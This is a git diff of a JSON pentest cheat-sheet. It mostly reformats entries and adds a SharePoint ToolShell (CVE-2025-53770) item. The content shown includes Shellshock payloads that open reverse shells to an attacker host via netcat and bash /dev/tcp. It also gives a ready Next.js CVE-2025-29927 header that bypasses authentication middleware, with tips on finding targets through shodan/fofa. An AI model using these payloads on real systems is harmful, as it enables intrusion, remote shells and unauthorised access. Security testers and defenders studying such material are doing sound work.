|
6 | 6 | "subcategory": "Tools", |
7 | 7 | "title": "CVE databases and tools", |
8 | 8 | "language": "text", |
9 | | - "tags": ["cve", "tools", "recon"], |
| 9 | + "tags": [ |
| 10 | + "cve", |
| 11 | + "tools", |
| 12 | + "recon" |
| 13 | + ], |
10 | 14 | "body": "Trickest CVE - automated collection of CVEs and PoCs (github.com/trickest/cve).\nNuclei Templates - community templates for finding vulnerabilities.\nMetasploit Framework - ready-made exploits.\nCVE Details (cvedetails.com) - vulnerability database." |
11 | 15 | }, |
12 | 16 | { |
13 | 17 | "subcategory": "Major CVEs", |
14 | 18 | "title": "Landmark CVEs over 15 years", |
15 | 19 | "language": "table", |
16 | | - "tags": ["cve", "reference"], |
| 20 | + "tags": [ |
| 21 | + "cve", |
| 22 | + "reference" |
| 23 | + ], |
17 | 24 | "body": "eternalblue struts drupalgeddon bluekeep citrix heartbleed shellshock", |
18 | 25 | "meta": { |
19 | 26 | "kind": "table", |
20 | 27 | "table": { |
21 | | - "headers": ["CVE", "Name", "Summary"], |
| 28 | + "headers": [ |
| 29 | + "CVE", |
| 30 | + "Name", |
| 31 | + "Summary" |
| 32 | + ], |
22 | 33 | "rows": [ |
23 | | - ["CVE-2017-0144", "EternalBlue", "RCE in SMBv1 (Windows) via specially crafted packets"], |
24 | | - ["CVE-2017-5638", "Apache Struts 2", "RCE via the Content-Type header"], |
25 | | - ["CVE-2018-7600", "Drupalgeddon 2", "RCE in Drupal 7.x / 8.x"], |
26 | | - ["CVE-2019-0708", "BlueKeep", "Pre-auth RCE in RDP (Remote Desktop Services)"], |
27 | | - ["CVE-2019-19781", "Citrix ADC / NetScaler", "Pre-auth RCE (path traversal -> execution)"], |
28 | | - ["CVE-2014-0160", "Heartbleed", "Memory leak in OpenSSL (TLS heartbeat)"], |
29 | | - ["CVE-2014-6271", "Shellshock", "RCE via environment variables in Bash (CGI)"] |
| 34 | + [ |
| 35 | + "CVE-2017-0144", |
| 36 | + "EternalBlue", |
| 37 | + "RCE in SMBv1 (Windows) via specially crafted packets" |
| 38 | + ], |
| 39 | + [ |
| 40 | + "CVE-2017-5638", |
| 41 | + "Apache Struts 2", |
| 42 | + "RCE via the Content-Type header" |
| 43 | + ], |
| 44 | + [ |
| 45 | + "CVE-2018-7600", |
| 46 | + "Drupalgeddon 2", |
| 47 | + "RCE in Drupal 7.x / 8.x" |
| 48 | + ], |
| 49 | + [ |
| 50 | + "CVE-2019-0708", |
| 51 | + "BlueKeep", |
| 52 | + "Pre-auth RCE in RDP (Remote Desktop Services)" |
| 53 | + ], |
| 54 | + [ |
| 55 | + "CVE-2019-19781", |
| 56 | + "Citrix ADC / NetScaler", |
| 57 | + "Pre-auth RCE (path traversal -> execution)" |
| 58 | + ], |
| 59 | + [ |
| 60 | + "CVE-2014-0160", |
| 61 | + "Heartbleed", |
| 62 | + "Memory leak in OpenSSL (TLS heartbeat)" |
| 63 | + ], |
| 64 | + [ |
| 65 | + "CVE-2014-6271", |
| 66 | + "Shellshock", |
| 67 | + "RCE via environment variables in Bash (CGI)" |
| 68 | + ] |
30 | 69 | ] |
31 | 70 | } |
32 | 71 | } |
|
35 | 74 | "subcategory": "Shellshock", |
36 | 75 | "title": "Shellshock - RCE via User-Agent (CGI)", |
37 | 76 | "language": "bash", |
38 | | - "tags": ["shellshock", "cve-2014-6271", "rce"], |
| 77 | + "tags": [ |
| 78 | + "shellshock", |
| 79 | + "cve-2014-6271", |
| 80 | + "rce" |
| 81 | + ], |
39 | 82 | "body": "echo -e \"HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () { :;}; /usr/bin/nc 10.0.0.2 4444 -e /bin/sh\\r\\n\"\ncurl --silent -k -H \"User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/4444 0>&1\" \"https://10.0.0.1/cgi-bin/admin.cgi\"" |
40 | 83 | }, |
41 | 84 | { |
42 | 85 | "subcategory": "Next.js CVE-2025-29927", |
43 | 86 | "title": "Next.js Middleware Bypass (CVE-2025-29927)", |
44 | 87 | "language": "text", |
45 | | - "tags": ["nextjs", "cve-2025-29927", "auth-bypass", "middleware"], |
| 88 | + "tags": [ |
| 89 | + "nextjs", |
| 90 | + "cve-2025-29927", |
| 91 | + "auth-bypass", |
| 92 | + "middleware" |
| 93 | + ], |
46 | 94 | "body": "Middleware bypass in Next.js (affected versions 11.1.4 - 15.2.2). Next.js middleware often carries authorization checks, redirects for unauthenticated users, security-header injection. To keep internal sub-requests from looping back through middleware, Next tags them with the x-middleware-subrequest header. The bug: the framework trusts that header even when it arrives from OUTSIDE. By sending it, an attacker passes their request off as internal and Next skips middleware entirely.\n\nImpact: bypass of authentication and authorization on routes guarded ONLY by middleware; bypass of redirects, CSP and any other checks set in middleware. CVSS 9.1, CWE-287.\n\nFix: Next.js 14.2.25 / 15.2.3 and later. Workaround without upgrading: strip the x-middleware-subrequest header at the WAF or reverse proxy.\n\nFinding targets: shodan/fofa for `x-middleware-rewrite`; Next responses often expose `x-nextjs-*` / `x-middleware-*` headers. Confirm: compare access to a protected route without the header (302/401/403) and with it (200)." |
47 | 95 | }, |
48 | 96 | { |
49 | 97 | "subcategory": "Next.js CVE-2025-29927", |
50 | 98 | "title": "Next.js CVE-2025-29927: exploitation via header", |
51 | 99 | "language": "http", |
52 | | - "tags": ["nextjs", "cve-2025-29927", "payload", "auth-bypass"], |
| 100 | + "tags": [ |
| 101 | + "nextjs", |
| 102 | + "cve-2025-29927", |
| 103 | + "payload", |
| 104 | + "auth-bypass" |
| 105 | + ], |
53 | 106 | "body": "# Bypass middleware (for example an authorization check) on a protected route.\n# The header convinces Next.js the request already passed middleware, so it is skipped.\nGET /admin/dashboard HTTP/1.1\nHost: example.com\nX-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware\n\n# App Router (Next 13+): repeat the \"middleware:\" chain by route nesting depth.\n# Pages Router / older versions use src/middleware and pages/_middleware.\n# Universal value (covers both schemes, as in the nuclei template):\n# X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware" |
| 107 | + }, |
| 108 | + { |
| 109 | + "subcategory": "SharePoint ToolShell CVE-2025-53770", |
| 110 | + "title": "SharePoint 'ToolShell' — unauth deserialization RCE (CVE-2025-53770)", |
| 111 | + "language": "http", |
| 112 | + "tags": [ |
| 113 | + "cve-2025-53770", |
| 114 | + "sharepoint", |
| 115 | + "deserialization", |
| 116 | + "rce", |
| 117 | + "kev" |
| 118 | + ], |
| 119 | + "body": "Unauthenticated RCE on on-prem Microsoft SharePoint via deserialization of untrusted data (ViewState). CVSS 9.8, CISA KEV, actively exploited ITW since July 2025. Part of the ToolShell chain (with CVE-2025-49704/49706/53771): auth bypass + forged __VIEWSTATE via ToolPane.aspx -> code under the IIS app pool; attackers first steal the MachineKey (ValidationKey/DecryptionKey) to keep signing ViewState — so a patch ALONE is not enough, you must rotate the key.\nAffects SharePoint Server 2016 / 2019 / Subscription Edition (Online is NOT affected).\nProbe: POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit with Referer: /_layouts/SignOut.aspx. Fix: the July MS patch + ROTATE the MachineKey + enable AMSI." |
54 | 120 | } |
55 | 121 | ] |
56 | 122 | } |
0 commit comments